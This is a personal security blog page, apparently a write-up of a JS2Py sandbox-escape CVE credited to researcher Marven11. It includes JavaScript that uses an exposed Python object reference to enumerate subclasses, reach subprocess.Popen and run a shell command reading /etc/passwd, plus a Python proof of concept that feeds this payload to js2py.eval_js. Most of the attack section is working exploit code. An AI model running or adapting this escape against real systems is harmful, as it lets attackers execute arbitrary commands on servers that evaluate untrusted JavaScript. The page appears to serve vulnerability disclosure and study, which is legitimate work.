7f454c4648656c7
                            f454,aoooooooa,c464
                          8656,oY"c6c6f2c"Yo,2077
                         0100,oY000003003e0Yo,00c0
                         0000oo0000000000c00oo0000
                         0c00oo0000 N0X 0000oo0000
                         0f05oo5f3cf4ff711fboo20e1
                         400e`obb0638000100do'1500
                          ff71`obada545e0ado'f05b
                            0e73"YoooooooY"1ffe
                              bdf6f726c64210a




[main] [about me] [writeups]                            Made with  by n0x


------ Vulnerability ------------------------------------------------------

This CVE was found by cybersecurity researcher Marven11.

Some global variables are available in the environment provided by
JS2Py, one of which exposes a reference to a Python object, allowing you
to escape the JS environment and go back into the structure of the Python
object.

The Javascript code for retrieving the Python object reference is as
follows:

.-------------------------------------------------------------------------.
| Object                                                                  |
|   .getOwnPropertyNames({})                                              |
|   .__getattribute__("__getattribute__")("__class__")                    |
|   .__base__                                                             |
'-------------------------------------------------------------------------'

From this code, we can enumerate the subclasses to access the libraries of
the Python Standard Library.

.-------------------------------------------------------------------------.
| // Retrieving the reference                                             |
| let pyref = Object                                                      |
|               .getOwnPropertyNames({})                                  |
|               .__getattribute__("__getattribute__")("__class__")        |
|               .__base__                                                 |
|                                                                         |
| for (let i in pyref.__subclasses__()) {                                 |
|    let item = pyref.__subclasses__()[i]                                 |
|     // If the subclass is the Popen function of the subprocess module   |
|     if (item.__module__ == "subprocess" && item.__name__ == "Popen") {  |
|         // Executing a command and retrieving its return                |
|         res = item(                                                     |
|            "head -n 1 /etc/passwd",                                     |
|             -1,                                                         |
|             null,                                                       |
|             -1,                                                         |
|             -1,                                                         |
|             -1,                                                         |
|             null,                                                       |
|             null,                                                       |
|             true                                                        |
|         ).communicate()                                                 |
|                                                                         |
|         console.log(res)                                                |
|     }                                                                   |
| }                                                                       |
'-------------------------------------------------------------------------'

------ POC ----------------------------------------------------------------

.-------------------------------------------------------------------------.
| import js2py                                                            |
|                                                                         |
| payload = """                                                           |
| let cmd = "head -n 1 /etc/passwd"                                       |
|                                                                         |
| // Retrieving the reference                                             |
| let pyref = Object                                                      |
|               .getOwnPropertyNames({})                                  |
|               .__getattribute__("__getattribute__")("__class__")        |
|               .__base__                                                 |
|                                                                         |
| for (let i in pyref.__subclasses__()) {                                 |
|    let item = pyref.__subclasses__()[i]                                 |
|     // If the subclass is the Popen function of the subprocess module   |
|     if (item.__module__ == "subprocess" && item.__name__ == "Popen") {  |
|         // Executing a command and retrieving its return                |
|         res = item(                                                     |
|            "head -n 1 /etc/passwd",                                     |
|             -1,                                                         |
|             null,                                                       |
|             -1,                                                         |
|             -1,                                                         |
|             -1,                                                         |
|             null,                                                       |
|             null,                                                       |
|             true                                                        |
|         ).communicate()                                                 |
|                                                                         |
|         console.log(res)                                                |
|     }                                                                   |
| }                                                                       |
| """                                                                     |
|                                                                         |
| def main():                                                             |
|     try:                                                                |
|         result = repr(js2py.eval_js(payload))                           |
|     except Exception:                                                   |
|         return False                                                    |
|                                                                         |
| if __name__ == "__main__":                                              |
|     main()                                                              |
'-------------------------------------------------------------------------'




___________________________________________________________________________

          [X] [github] [hackthebox] [root-me] [tryhackme] [ctftime]                    

        I also do some photograhy (pcb/die, animals, landscapes, etc).
             Feel free to check my Gurushots and Flickr profile